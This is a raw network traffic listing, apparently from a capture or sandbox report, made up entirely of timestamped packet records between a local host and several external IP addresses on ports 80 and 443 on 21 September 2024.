                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486887932 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486901045 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486911058 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486922979 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486929893 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486934900 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486948013 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486958981 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486969948 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486975908 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486980915 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486989021 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.486991882 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487004995 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487016916 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487025976 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487027884 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487039089 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487041950 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487055063 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487062931 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487066984 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487078905 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487087965 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487091064 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487102985 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487111092 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487114906 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487127066 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487138033 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487139940 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487150908 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487152100 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487164974 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487170935 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487179995 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487191916 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487199068 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487205029 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487216949 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487227917 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487231016 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487241983 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487243891 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487257957 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487263918 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487270117 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487282991 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487293005 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487301111 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487312078 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487323046 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487328053 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487334967 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487344980 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487346888 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487360001 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487371922 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487380028 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487394094 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487404108 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487407923 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487417936 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487421989 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487432957 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487443924 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487457037 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487457991 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487469912 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487479925 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487483025 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487495899 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487497091 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487509012 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487515926 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487521887 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487535954 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487560987 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487801075 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487812996 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487824917 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487837076 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487848043 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487854958 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487863064 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487874031 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487874985 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487885952 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487891912 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487921953 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487952948 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487966061 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487972975 CEST49725443192.168.2.9185.166.143.48
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487977028 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487987995 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487989902 CEST44349725185.166.143.48192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.487997055 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488001108 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488013983 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488024950 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488032103 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488037109 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488050938 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488061905 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488065004 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488074064 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488082886 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488085985 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488104105 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488106966 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488121033 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488125086 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488132954 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488142967 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488145113 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488157034 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488168001 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488173008 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488173962 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488179922 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488192081 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488199949 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488204002 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488217115 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488219023 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488228083 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488238096 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488240004 CEST44349725185.166.143.48192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488240004 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488250971 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488266945 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488270998 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488282919 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488292933 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488306999 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488317966 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488322020 CEST4971180192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488322020 CEST49725443192.168.2.9185.166.143.48
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488328934 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488341093 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488351107 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488352060 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488364935 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488368034 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488378048 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488385916 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488390923 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488403082 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488415003 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488424063 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488428116 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488440037 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488451004 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488461018 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488462925 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488471985 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488476038 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488492012 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488517046 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488826990 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488847017 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488859892 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488872051 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488886118 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488888979 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488904953 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488909006 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488917112 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488929033 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488931894 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488940954 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488954067 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488960028 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488967896 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488976955 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.488995075 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489006042 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489016056 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489021063 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489033937 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489042044 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489046097 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489058971 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489068031 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489070892 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489083052 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489089966 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489094973 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489106894 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489109039 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489126921 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489136934 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489140034 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489152908 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489160061 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489166021 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489176989 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489180088 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489192009 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489202976 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489207029 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489214897 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489231110 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489237070 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489248991 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489253044 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489262104 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489274025 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489280939 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489288092 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489296913 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489299059 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489311934 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489322901 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489331961 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489334106 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489346981 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489352942 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489361048 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489372015 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489375114 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489386082 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489398003 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489403963 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489412069 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489423990 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489429951 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489439964 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489440918 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489454985 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489466906 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489470005 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489485025 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489495993 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489497900 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489511013 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489514112 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489540100 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489564896 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489733934 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489748001 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489758968 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489770889 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489774942 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489783049 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489788055 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489797115 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489809990 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489814043 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489823103 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489833117 CEST8049709147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489840984 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489845037 CEST8049712103.130.147.211192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489854097 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489861012 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489871025 CEST4970980192.168.2.9147.45.44.104
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489885092 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489901066 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489907026 CEST4971280192.168.2.9103.130.147.211
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489913940 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489923000 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489923954 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489937067 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489949942 CEST8049711147.45.44.104192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489959955 CEST4971380192.168.2.9176.113.115.33
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489970922 CEST8049713176.113.115.33192.168.2.9
                                                                                                                                                                                                                                        Sep 21, 2024 14:48:10.489983082 CEST8049713176.113.115.33192.168.2.9
